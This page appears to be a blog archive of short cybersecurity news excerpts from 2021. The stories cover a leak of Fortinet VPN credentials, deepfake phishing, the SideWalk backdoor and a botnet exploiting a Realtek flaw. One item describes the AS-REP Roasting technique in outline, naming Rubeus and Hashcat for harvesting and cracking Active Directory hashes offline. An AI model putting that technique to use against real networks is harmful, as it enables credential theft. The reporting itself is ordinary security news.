Blog

Archive for the ‘cybercrime/malcode’ category: Page 112

Sep 9, 2021

Hackers leak passwords for 500,000 Fortinet VPN accounts

Posted by in category: cybercrime/malcode

A threat actor has leaked a list of almost 500,000 Fortinet VPN login names and passwords that were allegedly scraped from exploitable devices last summer.

While the threat actor states that the exploited Fortinet vulnerability has since been patched, they claim that many VPN credentials are still valid.

This leak is a serious incident as the VPN credentials could allow threat actors to access a network to perform data exfiltration, install malware, and perform ransomware attacks.

Sep 2, 2021

What is AS-REP Roasting attack, really?

Posted by in category: cybercrime/malcode

AS-REP Roasting is the technique that allows retrieving password hashes for users that have this flag set in Active Directory. Additionally, various cybersecurity and hacking tools allow cracking the TGTs harvested from Active Directory. These include Rubeus and Hashcat.

Using a tool like Rubeus, attackers can find the accounts that do not require preauthentication and then extract the ticket-granting ticket (TGT) data for cracking the password offline.

Data can be transformed into a format that can be cracked by an offline tool such as Hashcat, which can use brute force password cracking against the hashes. This process incorporates the use of a dictionary file for brute-force password guessing.

Aug 31, 2021

Ten Agencies Plan to Increase Use of Facial Recognition Technology

Posted by in categories: cybercrime/malcode, government, mobile phones, robotics/AI

As the use of facial recognition technology (FRT) continues to expand, Congress, academics, and advocacy organizations have all highlighted the importance of developing a comprehensive understanding of how it is used by federal agencies.

The Government Accountability Office (GAO) has surveyed 24 federal agencies about their use of FRT. The performance audit ran from April2020through August 2021. 16 of the 24 agencies reported using it for digital access or cybersecurity, such as allowing employees to unlock agency smartphones with it, six agencies reported using it to generate leads in criminal investigations, five reported using FRT for physical security, such as controlling access to a building or facility, and 10 agencies said they planned to expand its use through fiscal year 2023.

In addition, both the Department of Homeland Security (DHS) and the Department of State reported using FRT to identify or verify travelers within or seeking admission to the United States, identifying or verifying the identity of non-U.S. citizens already in the United States, and to research agency information about non-U.S. citizens seeking admission to the United States. For example, DHS’s U.S. Customs and Border Protection used its Traveler Verification Service at ports of entry to assist with verifying travelers’ identities. The Traveler Verification Service uses FRT to compare a photo taken of the traveler at a port of entry with existing photos in DHS holdings, which include photographs from U.S. passports, U.S. visas, and other travel documents, as well as photographs from previous DHS encounters.

Aug 30, 2021

Deepfakes in cyberattacks aren’t coming. They’re already here

Posted by in categories: business, cybercrime/malcode

Recorded Future, an incident-response firm, noted that threat actors have turned to the dark web to offer customized services and tutorials that incorporate visual and audio deepfake technologies designed to bypass and defeat security measures. Just as ransomware evolved into ransomware-as-a-service (RaaS) models, we’re seeing deepfakes do the same. This intel from Recorded Future demonstrates how attackers are taking it one step further than the deepfake-fueled influence operations that the FBI warned about earlier this year. The new goal is to use synthetic audio and video to actually evade security controls. Furthermore, threat actors are using the dark web, as well as many clearnet sources such as forums and messengers, to share tools and best practices for deepfake techniques and technologies for the purpose of compromising organizations.

Deepfake phishing

I’ve spoken with CISOs whose security teams have observed deepfakes being used in phishing attempts or to compromise business email and communication platforms like Slack and Microsoft Teams. Cybercriminals are taking advantage of the move to a distributed workforce to manipulate employees with a well-timed voicemail that mimics the same speaking cadence as their boss, or a Slack message delivering the same information. Phishing campaigns via email or business communication platforms are the perfect delivery mechanism for deepfakes, because organizations and users implicitly trust them and they operate throughout a given environment.

Aug 29, 2021

World’s Second-Leading Crypto Network Ethereum Splits Into Two Chains

Posted by in categories: bitcoin, cryptocurrencies, cybercrime/malcode

The blockchain Ethereum saw a chain split today as a software bug affected a large quantity of full node clients.

Aug 28, 2021

5 emerging cybersecurity threats facing the U.S.

Posted by in categories: business, cybercrime/malcode

Karim Hijazi is CEO of Prevailion, a cyber intelligence company that monitors and detects active threats by infiltrating hacker networks. Hijazi is also a former director of intelligence for Mandiant and a former contractor for the US intelligence community.

Ransomware has taken the spotlight lately following a string of brazen attacks on major U.S. companies.

And as bad as this kind of malware is, businesses and investors can expect to face a growing number of sophisticated cyber threats that could be even more disruptive and difficult to prevent.

Aug 28, 2021

Microsoft Warns of Widespread Phishing Attacks Using Open Redirects

Posted by in category: cybercrime/malcode

Microsoft is warning of a widespread credential phishing campaign that leverages open redirector links.

Aug 26, 2021

US Air Force prioritizes blockchain security with new Constellation Network contract

Posted by in categories: bitcoin, cybercrime/malcode, encryption, military

A blockchain-based initiative from the United States Air Force will employ Constellation’s Hypergraph Network to provide data security with the Department of Defense’s commercial partners.

In a Thursday announcement, Constellation said it had been working with Kinnami Software Corporation to develop an end-to-end data security solution using blockchain encryption and distributed data management for the United States Transportation Command, Air Mobility Command’s 618th Air Operations Center, and a Civil Reserve Air Fleet partner. According to the platform, its goal is to securely exchange data with commercial partners on missions involving the operations of aircraft and ships under contract to the Department of Defense, or DoD.

The United States Transportation Command, or USTRANSCOM, allows authorities — including those in the 618th — to coordinate missions using available resources from both the military and private sector. Constellation Network’s solution may have the potential to improve the existing cybersecurity and general effectiveness.

Aug 25, 2021

New SideWalk Backdoor Targets U.S.-based Computer Retail Business

Posted by in categories: business, cybercrime/malcode

A computer retailer in the United States was recently attacked with a new backdoor malware called “SideWalk.”

Aug 25, 2021

Hundreds of thousands of Realtek-based devices under attack from IoT botnet

Posted by in category: cybercrime/malcode

A dangerous vulnerability in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors is currently under attack from a notorious DDoS botnet gang.

The attacks started last week, according to a report from IoT security firm SAM, and began just three days after fellow security firm IoT Inspector published details about the vulnerability on its blog.

Tracked as CVE-2021–35395, the vulnerability is part of four issues IoT Inspector researchers found in the software development kit (SDK) that ships with multiple Realtek chipsets (SoCs).